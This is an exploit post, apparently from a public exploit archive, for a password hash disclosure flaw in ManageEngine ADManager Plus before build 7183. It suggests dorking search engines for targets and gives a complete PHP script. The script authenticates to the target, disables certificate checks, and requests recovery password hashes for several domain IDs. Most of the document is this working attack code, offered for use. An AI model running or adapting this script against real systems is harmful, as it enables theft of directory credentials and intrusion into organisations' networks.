ManageEngine ADManager 7183 Password Hash Disclosure

`=============================================================================================================================================  
| # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.manageengine.com/products/ad-manager/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability..  
  
[+] save code as poc.php .  
  
[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>  
  
[+] PayLoad :  
  
<?php  
  
// تعطيل تحذيرات HTTPS  
error_reporting(0);  
  
function getPass($target, $auth, $user, $password) {  
// تهيئة Session  
$ch = curl_init();  
  
// تحويل نوع المصادقة إذا كان ADManager  
if (strtolower($auth) == 'admanager') {  
$auth = 'ADManager Plus Authentication';  
}  
  
// بيانات تسجيل الدخول  
$data = http_build_query([  
"is_admp_pass_encrypted" => "false",  
"j_username" => $user,  
"j_password" => $password,  
"domainName" => $auth,  
"AUTHRULE_NAME" => "ADAuthenticator"  
]);  
  
// إعدادات الطلب  
$url = $target . 'j_security_check?LogoutFromSSO=true';  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_HTTPHEADER, [  
"User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",  
"Content-Type: application/x-www-form-urlencoded"  
]);  
  
// إرسال الطلب  
$response = curl_exec($ch);  
  
// التحقق من المصادقة  
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
if (strpos($response, 'Cookie') !== false) {  
echo "[+] Authentication successful!\n";  
} elseif ($http_code == 200) {  
echo "[-] Invalid login name/password!\n";  
exit(0);  
} else {  
echo "[-] Something went wrong!\n";  
exit(1);  
}  
  
// استرجاع كلمة المرور  
for ($i = 1; $i <= 5; $i++) {  
echo "[*] Trying to fetch recovery password for domainId: $i!\n";  
$passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';  
curl_setopt($ch, CURLOPT_URL, $passUrl);  
curl_setopt($ch, CURLOPT_POST, false);  
$passResponse = curl_exec($ch);  
  
if ($passResponse) {  
echo $passResponse . "\n";  
}  
}  
  
curl_close($ch);  
}  
  
function get_args() {  
global $argv;  
  
$args = [  
'target' => '',  
'auth' => '',  
'user' => '',  
'password' => ''  
];  
  
for ($i = 1; $i < count($argv); $i++) {  
switch ($argv[$i]) {  
case '-t':  
case '--target':  
$args['target'] = $argv[++$i];  
break;  
case '-a':  
case '--auth':  
$args['auth'] = $argv[++$i];  
break;  
case '-u':  
case '--user':  
$args['user'] = $argv[++$i];  
break;  
case '-p':  
case '--password':  
$args['password'] = $argv[++$i];  
break;  
}  
}  
  
return $args;  
}  
  
function main() {  
$args = get_args();  
if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {  
echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";  
exit(1);  
}  
  
getPass($args['target'], $args['auth'], $args['user'], $args['password']);  
}  
  
main();  
  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`